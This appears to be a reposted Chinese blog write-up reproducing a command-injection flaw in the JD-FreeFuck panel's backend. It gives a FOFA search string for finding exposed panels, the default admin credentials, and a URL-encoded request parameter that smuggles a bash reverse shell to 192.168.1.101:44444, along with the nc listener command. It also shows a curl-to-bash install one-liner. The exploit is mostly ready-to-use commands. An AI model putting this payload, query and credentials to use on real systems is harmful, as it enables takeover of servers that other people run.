JD-FreeFuck 后台命令执行漏洞

JD-FreeFuck 后台命令执行漏洞

漏洞说明

JD-FreeFuck 存在后台命令执行漏洞,由于传参执行命令时没有对内容过滤,导致可以执行任意命令,控制服务器

项目地址:https://github.com/meselson/JD-FreeFuck

环境搭建

脚本一键部署:

bash <(curl -sSL https://gitee.com/mjf521/JD-FreeFuck/raw/main/install.sh)

漏洞复现

FOFA搜索

title="京东薅羊毛控制面板"

访问后登录页面

JD-FreeFuck 后台命令执行漏洞_第1张图片

默认用户名密码:

useradmin
supermanito

JD-FreeFuck 后台命令执行漏洞_第2张图片

手动执行脚本---切换换行抓包

![屏幕截图 2021-04-14 100803](https://tomyyyyy.oss-cn-hangzhou.aliyuncs.com/img/屏幕截图 2021-04-14 100803.jpg)

然后发送包:

JD-FreeFuck 后台命令执行漏洞_第3张图片

反弹shell

cmd=bash+jd.sh+%3Bbash+-c+'exec+bash+-i+%26%3E%2Fdev%2Ftcp%2F192.168.1.101%2F44444+%3C%261'%3B+now

监听端:

nc -lvvp 44444

你可能感兴趣的:(安全,docker,安全,shell,linux,git)